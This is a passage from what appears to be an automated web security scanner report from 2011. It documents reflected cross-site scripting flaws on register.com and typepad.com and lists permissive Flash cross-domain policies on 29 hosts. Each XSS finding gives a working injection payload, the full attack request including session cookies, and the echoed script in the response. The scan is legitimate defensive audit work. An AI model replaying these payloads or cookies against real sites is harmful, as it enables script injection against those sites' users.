This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js7da06"%3balert(1)//439baa57256/aop-attach.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:18 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22780
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/js7da06";alert(1)//439baa57256/aop-attach.js",width:400,height:400 }
</script>
...[SNIP]...

4.20. http://www.register.com/js/homepage-optimized.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/homepage-optimized.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab187"%3balert(1)//73f4a6a9461 was submitted in the REST URL parameter 1. This input was echoed as ab187";alert(1)//73f4a6a9461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /jsab187"%3balert(1)//73f4a6a9461/homepage-optimized.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:35:35 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22796
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/jsab187";alert(1)//73f4a6a9461/homepage-optimized.js",width:400,height:400 }
</script>
...[SNIP]...

4.21. http://www.register.com/js/jquery-1.3.2.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2708"%3balert(1)//8e023ddd2cd was submitted in the REST URL parameter 1. This input was echoed as c2708";alert(1)//8e023ddd2cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /jsc2708"%3balert(1)//8e023ddd2cd/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:35:12 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22792
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/jsc2708";alert(1)//8e023ddd2cd/jquery-1.3.2.min.js",width:400,height:400 }
</script>
...[SNIP]...

4.22. http://www.register.com/unauthenticated_session_expired.rcmx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/unauthenticated_session_expired.rcmx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbc4"%3balert(1)//79639f1ebd8 was submitted in the REST URL parameter 1. This input was echoed as fbbc4";alert(1)//79639f1ebd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unauthenticated_session_expired.rcmxfbbc4"%3balert(1)//79639f1ebd8?opener=/domain/searchresults.rcmx HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547; OAX=Mhd7ak5inIsACxRd; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:15:09 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22820
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/unauthenticated_session_expired.rcmxfbbc4";alert(1)//79639f1ebd8",width:400,height:400 }
</script>
...[SNIP]...

4.23. http://www.typepad.com/services/toolbar [autofollowed parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.typepad.com
Path:	/services/toolbar

Issue detail

The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b29d9%3balert(1)//eb59c1b15d3 was submitted in the autofollowed parameter. This input was echoed as b29d9;alert(1)//eb59c1b15d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /services/toolbar?blog_id=6a011571d38234970b011570df1227970c&asset_id=&atype=index&to=http%3A%2F%2Fmeetupblog.meetup.com%2F&autofollowed=0b29d9%3balert(1)//eb59c1b15d3&safe_to_modify_body=0 HTTP/1.1
Host: www.typepad.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 13:13:20 GMT
Server: Apache
X-Webserver: oak-tp-app004
Cache-Control: private
Pragma: no-cache
Vary: cookie,negotiate,accept-language,Accept-Encoding
Content-Language: en
Content-Length: 14887
Content-Type: text/html; charset=utf-8
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c
...[SNIP]...
lorAnim = YAHOO.util.ColorAnim,
Easing = YAHOO.util.Easing,
Cookie = YAHOO.util.Cookie,
TPToolbar = {};

TPToolbar = {

params: {
autofollowed: 0b29d9;alert(1)//eb59c1b15d3,
blog_user_xid: '6p011571d38234970b',
display: 0,
entry_xid: '',
logged_in: 0,
safe_to_modify_body: '0',
permal
...[SNIP]...

4.24. http://www.register.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.register.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6856"-alert(1)-"f95696cf372 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=f6856"-alert(1)-"f95696cf372

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:08 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 30175
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=f6856"-alert(1)-"f95696cf372";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.25. http://www.register.com/domain/searchresults.rcmx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.register.com
Path:	/domain/searchresults.rcmx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35db8"-alert(1)-"435739ce645 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=35db8"-alert(1)-"435739ce645
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:12:57 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=71D10E28389822DF56D6996222F9628D.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=2eebf6c5fd804083704d9b02ca9b3f46abf8bee842bc06ca4e62a5cd60ac0ec50a2f7973; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 31335
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=35db8"-alert(1)-"435739ce645";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.26. http://www.register.com/unauthenticated_session_expired.rcmx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.register.com
Path:	/unauthenticated_session_expired.rcmx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2064"-alert(1)-"625a6b7fc7b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /unauthenticated_session_expired.rcmx?opener=/domain/searchresults.rcmx HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e2064"-alert(1)-"625a6b7fc7b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547; OAX=Mhd7ak5inIsACxRd; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:14:57 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 23259
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=e2064"-alert(1)-"625a6b7fc7b";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5. Flash cross-domain policy previous next
There are 29 instances of this issue:

http://adx.adnxs.com/crossdomain.xml
http://ajax.googleapis.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://c.mouseflow.com/crossdomain.xml
http://c7.zedo.com/crossdomain.xml
http://cspix.media6degrees.com/crossdomain.xml
http://d.adroll.com/crossdomain.xml
http://d3.zedo.com/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://imagesak.securepaynet.net/crossdomain.xml
http://img1.wsimg.com/crossdomain.xml
http://img3.wsimg.com/crossdomain.xml
http://m.adnxs.com/crossdomain.xml
http://registercom.tt.omtrdc.net/crossdomain.xml
http://s.gravatar.com/crossdomain.xml
http://segment-pixel.invitemedia.com/crossdomain.xml
http://value.register.com/crossdomain.xml
http://www.wunderground.com/crossdomain.xml
http://ads.lfstmedia.com/crossdomain.xml
http://edge.sharethis.com/crossdomain.xml
http://login.dotomi.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://w.sharethis.com/crossdomain.xml
http://www.godaddy.com/crossdomain.xml
https://www.godaddy.com/crossdomain.xml
http://www.youtube-nocookie.com/crossdomain.xml
http://stats.wordpress.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://adx.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:41:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.2. http://ajax.googleapis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sat, 03 Sep 2011 23:16:57 GMT
Date: Fri, 02 Sep 2011 23:16:57 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 80212

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.3. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sat, 03 Sep 2011 21:33:49 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.4. http://c.mouseflow.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.mouseflow.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.mouseflow.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 20 Apr 2011 14:02:32 GMT
Accept-Ranges: bytes
ETag: "3e38109863ffcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 03 Sep 2011 21:34:45 GMT
Connection: close
Content-Length: 103

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://c7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5087
Date: Sat, 03 Sep 2011 21:40:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.6. http://cspix.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
